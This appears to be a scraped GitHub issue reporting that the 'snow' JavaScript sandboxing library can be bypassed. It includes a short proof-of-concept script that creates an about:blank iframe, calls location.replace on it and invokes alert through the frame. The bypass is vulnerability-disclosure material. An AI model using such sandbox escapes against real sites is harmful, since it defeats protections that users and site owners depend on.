snow icon indicating copy to clipboard operation
snow copied to clipboard

Snow can be bypassed with location.replace

Open hackvertor opened this issue 1 year ago • 3 comments

setInterval(x=>xyz.alert(1337))
i=document.createElement('iframe');
i.src='about:blank';
i.name='xyz';
document.body.append(i);
setTimeout(x=>i.contentDocument.location.replace(123));

hackvertor avatar Oct 16 '23 17:10 hackvertor